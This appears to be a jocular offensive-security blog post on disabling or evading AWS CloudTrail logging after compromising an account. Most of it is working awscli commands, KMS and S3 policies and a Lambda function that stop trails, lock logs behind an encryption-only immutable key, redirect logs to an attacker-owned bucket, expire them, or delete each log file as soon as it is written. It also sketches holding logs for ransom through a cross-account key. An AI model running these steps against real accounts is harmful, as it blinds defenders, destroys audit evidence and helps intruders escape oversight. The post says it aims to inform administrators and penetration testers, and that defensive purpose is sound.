So you’ve pwned an AWS account — congratulations — now what? You’re eager to get to the data theft, amirite? What about that whole cyber kill chain thing; installation, command & control, actions on objectives?
What if someone is watching? Too many questions guy… Let’s just disable logging and move on to the fun stuff.
The main source of log data in AWS are CloudTrails.
You can use AWS CloudTrail to get a history of AWS API calls and related events for your account. This includes calls made by using the AWS Management Console, AWS SDKs, command line tools, and higher-level AWS services.
Let’s check out what CloudTrails are enabled:
aws cloudtrail describe-trails
If you see an empty list, you might want to send your victim a t-shirt and thank them for their participation, kind of like a reverse bug bounty. If you see one or more trails, the fun starts now.
Depending on your mood (and occasionally your pwned account’s access policy), AWS offers a buffet of options. So much so, I used to be indecisive but now I’m not so sure.
Starting with the obvious and loudest, deleting the CloudTrail:
aws cloudtrail delete-trail --name [my-trail]
Only slightly less obvious, disabling logging:
aws cloudtrail stop-logging --name [my-trail]
Your target may be actively monitoring both of those API calls so those tactics are probably best left to nights of drunken regret and forcefully purged with tequila.
Most resources in AWS are region specific. However, CloudTrails are a little different and can be configured to be global. While it’s a default, it’s not super common for a trail bound to a home region, and that makes the setting a perfect target for manipulation. Disabling multi region logging gives you free reign in every region except for the one the trail was created in.
aws cloudtrail update-trail --name [my-trail] --no-is-multi-region-trail --no-include-global-service-events
You may have noticed two flags being unset in the above command. The second also “specifies whether the trail is publishing events from global services such as IAM”, which is handy if you want to say, create some backdoor accounts and API keys. It can only be unset if the first is also unset which is unfortunate for stealthiness.
One of the great things about AWS is they’ve really thought about security. In fact, they’ve created many services specifically designed and dedicated to security. For example, the Key Management Service (KMS) tightly integrates with other services to provide almost seamless encryption. It just so happens that integration includes CloudTrail.
It’s a little bit more effort to get CloudTrail encryption bootstrapped but it’s well worth it. Once enabled, log files will be encrypted but everything else will look normal; configuration will remain almost identical and log files will continue to be delivered to the correct location, in the expected structure.
First, let’s setup a policy file for a new key, ensuring it only allows encryption by CloudTrail and nothing else — we don’t want those pesky administrators using it for decryption. Note the references to [account-id] which have to be replaced as appropriate.
{
"Version": "2012-10-17",
"Id": "Key policy created for CloudTrail",
"Statement": [
{
"Sid": "Enable IAM User Permissions",
"Effect": "Allow",
"Principal": {
"AWS": "[account-id]/[user-id]"
},
"Action": [
"kms:DisableKey",
"kms:ScheduleKeyDeletion",
"kms:GenerateDataKey*",
"kms:DescribeKey"
],
"Resource": "*"
},
{
"Sid": "Allow CloudTrail to encrypt logs",
"Effect": "Allow",
"Principal": {
"Service": "cloudtrail.amazonaws.com"
},
"Action": "kms:GenerateDataKey*",
"Resource": "*",
"Condition": {
"StringLike": {
"kms:EncryptionContext:aws:cloudtrail:arn": "arn:aws:cloudtrail:*:[account-id]:trail/*"
}
}
},
{
"Sid": "Allow CloudTrail to describe key",
"Effect": "Allow",
"Principal": {
"Service": "cloudtrail.amazonaws.com"
},
"Action": "kms:DescribeKey",
"Resource": "*"
}
]
}
AWS policies default to deny rules so this policy also denies its own deletion. While not useful, its a painful kick to the nether regions requiring manual Support intervention.
Create a key, attaching the policy:
aws kms create-key --bypass-policy-lockout-safety-check --policy [file:///my-policy.json]
The “bypass-policy-lockout-safety-check” flag allows you the make the key’s policy immutable after creation, making logging just an exercise in lighting money on fire with disk consumption. You can’t say Amazon didn’t warn you!
Finally, put it all together by encrypting the target trail with the immutable encryption-only key:
aws cloudtrail update-trail --name [my-trail] --kms-key-id [my-key]
While that’s by far the slickest encryption tactic, there are others. You can start encrypting a trail, disable the key and schedule it for deletion. If you aren’t going to disable the key, you can remove the disable and delete actions from the policy to make the key undeletable (it’s a word, trust me).
aws kms disable-key --key-id [my-key]
aws kms schedule-key-deletion --key-id [my-key] --pending-window-in-days 7
The deletion won’t happen for 7 days but the trail won’t be written regardless. Manually inspecting the trail in the AWS web interface won’t show any signs of failure either, unless the vicim is familiar enough with the interface to notice a missing ‘last delivered’ section. However, checking the trail status via cli will show “LatestDeliveryError” as “KMS.DisabledException”.
aws cloudtrail get-trail-status --name [my-trail]
Finally, if you really wanted to be mean, you could set the encryption key to be one hosted in another account you control. The only minor change required to the base tactic is to ensure the “GenerateDataKey*” action includes the source account-id in the condition section.
If you wanted to be even meaner and found out your victim knew you did this mean thing, you could send them an email suggesting they make a one time tax-free donation to get a copy of the key. That’s a joke — ransomware is pure evil and needs to die in a fire but doing it through AWS does add some dramatic effect, no?
CloudTrails are written to S3 buckets so logs can be redirected to a separate account owned by someone else. You know, like… you. Or better yet, a cyber-patsy™ (I thought this blog was cyber free?). The S3 namespace is global and world writable buckets are more plentiful than poop in my kid’s nappies, and that’s saying a lot! More on that at some point in the future (the buckets not the poop).
aws cloudtrail update-trail --name my-trail --s3-bucket-name [cyber-patsy-bucket]
I know what you are thinking. Scrap that, I barely know what I am thinking but this S3 bucket stuff is interesting, right?
Targeting the S3 bucket where logs are being written has some distinct advantages. It’s much stealthier than manipulating a trail directly. It’s also more likely to be an available option in a more restricted account context.
As with encryption keys, it is possible to delete a bucket being used for logging.
aws s3 rb --force [s3://my-bucket]
The results are much the same with the exception that the failure is very visible when the affected trail is viewed in the AWS web console.
Similarly, it’s possible to update the bucket policy to prevent CloudTrail from writing to it. Simply delete the “AWSCloudTrailWrite20150319” section of the default generated policy.
{
"Version":"2012-10-17",
"Statement":[
{
"Sid":"AWSCloudTrailAclCheck20150319",
"Effect":"Allow",
"Principal":{
"Service":"cloudtrail.amazonaws.com"
},
"Action":"s3:GetBucketAcl",
"Resource":"arn:aws:s3:::[my-trail]"
},
{
"Sid":"AWSCloudTrailWrite20150319",
"Effect":"Allow",
"Principal":{
"Service":"cloudtrail.amazonaws.com"
},
"Action":"s3:PutObject",
"Resource":"arn:aws:s3:::[my-bucket]/*",
"Condition":{
"StringEquals":{
"s3:x-amz-acl":"bucket-owner-full-control"
}
}
}
]
}
Then write the policy to the bucket.
aws s3api put-bucket-policy --bucket [my-trail] --policy [file:///my-policy.json]
Again, logging will stop and the web console will display a policy error when viewing the affected trail.
I did attempt to abuse bucket ACLs — these are separate from policies, not sure why — but came up with nothing. It seems even removing the owners ACL wasn’t effective as it could simply be reinstated by the bucket owner.
One of the stealthiest but riskiest options to disrupt logging is to manipulate the target bucket’s lifecycle policy. Buckets can be configured to automatically delete objects after one (or more) days.
aws s3api put-bucket-lifecycle-configuration \
--bucket [my-bucket] \
--lifecycle-configuration [file://s3-lifecycle-config.json]
{
"Rules": [
{
"Status": "Enabled",
"Prefix": "",
"Expiration": {
"Days": 1
},
"ID": "Rule for the Entire Bucket"
}
]
}
It’s unlikely this tactic will be monitored however log files will still live one day and any external ingestion of those files to a SIEM is likely to proceed unimpeded.
There’s an elephant in the room. Have you seen it? Simply deleting the log files immediately once they are written hasn’t been mentioned. That’s because AWS is awesome provides an automated mechanism infinitely better than manually deleting the files and I left it till last. Introducing AWS Lambda.
AWS Lambda is a compute service where you can upload your code to AWS Lambda and the service can run the code on your behalf using AWS infrastructure. After you upload your code and create what we call a Lambda function, AWS Lambda takes care of provisioning and managing the servers that you use to run the code. You can use AWS Lambda as … an event-driven compute service where AWS Lambda runs your code in response to events, such as changes to data in an Amazon S3 bucket…
Setting up a Lambda function to immediately delete anything written to an S3 bucket is a little louder and more involved than any other tactic discussed, but it’s worth it. Because the Lambda function is invoked directly by S3, it will win any race against other code attempting to consume files written to the bucket, effectively making them invisible.
To get it going, create a role that can be assumed by Lambda.
aws iam create-role \
--role-name [lambda_s3_innocent_role] \
--assume-role-policy-document [file:///iam-assume-by-lambda.json]
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "lambda.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
}
Create a policy to attach to the role that allows Lambda to delete s3 objects and whatever else you like. You could also update an existing policy for extra stealth.
aws iam create-policy \
--policy-name [lambda_s3_innocent_policy] \
--policy-document [file:///lambda-s3-delete-policy.json]
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"logs:CreateLogGroup",
"logs:CreateLogStream",
"logs:PutLogEvents"
],
"Resource": "arn:aws:logs:*:*:*"
},
{
"Effect": "Allow",
"Action": [
"s3:GetObject",
"s3:PutObject",
"s3:DeleteObject",
"s3:DeleteObjectVersion"
],
"Resource": [
"arn:aws:s3:::*"
]
}
]
}
Attach the policy to the role.
aws iam attach-role-policy \
--role-name [lambda_s3_innocent_role] \
--policy-arn arn:aws:iam::[account-id]:policy/[lambda_s3_innocent_policy]
Create the actual Lambda python function code that will delete an s3 object passed to it every time it is invoked.
import json
import urllib
import boto3
s3 = boto3.client('s3')
def lambda_handler(event, context):
bucket = event['Records'][0]['s3']['bucket']['name']
key = urllib.unquote_plus(event['Records'][0]['s3']['object']['key']).decode('utf8')
try:
response = s3.delete_object(Bucket=bucket, Key=key)
except Exception as e:
print(e)
raise e
Compress the code and register the function.
zip my_code.zip my_code.pyaws lambda create-function \
--region [region] \
--function-name [innocent_function] \
--zip-file [fileb:///my_code.zip] \
--role arn:aws:iam::[account-id]:role/[lambda_s3_innocent_role] \
--handler [my_code].lambda_handler \
--runtime python2.7 \
--timeout 3 \
--memory-size 128 \
--publish
Permit Lambda to be invoked by S3.
aws lambda add-permission \
--function-name [innocent_function] \
--statement-id [my-guid] \
--principal s3.amazonaws.com \
--action lambda:InvokeFunction \
--source-arn arn:aws:s3:::[my-bucket]
Configure the bucket to call Lambda every time it creates an object.
aws s3api put-bucket-notification-configuration \
--bucket [my-bucket] \
--notification-configuration [file:///s3-notify-config.json]
{
"LambdaFunctionConfigurations": [
{
"LambdaFunctionArn": "arn:aws:lambda:[my-region]:[account-id]:function:[my-function]",
"Id": "[my-guid]",
"Events": [
"s3:ObjectCreated:*"
]
}
]
}
Easy, right? Kind of, maybe, at least? There’s more good news though.
The Lambda free tier includes 1M free requests per month and 400,000 GB-seconds of compute time per month.
Unusual billing patterns tip off administrators more often than people would like to admit but this tactic combined with the Lambda free tier conveniently avoids those awkward moments.
This article was written under the assumption you have access to an AWS API key or role with some reasonably broad permissions and an up-to-date installed awscli.
More importantly, it was written to enlighten AWS account administrators and improve legitimate penetration testing TTPs. In fact, as I wrote this article engineers at my workplace implemented mitigations and test for gaps this work identified. Regardless, let’s not fool ourselves, our foes are orders of magnitude smarter than me and probably also know what “orders of magnitude” means precisely. Help?
Go forth and conquer.
Want to learn to hack AWS? I offer immersive online and in-person training to corporate teams at hackaws.cloud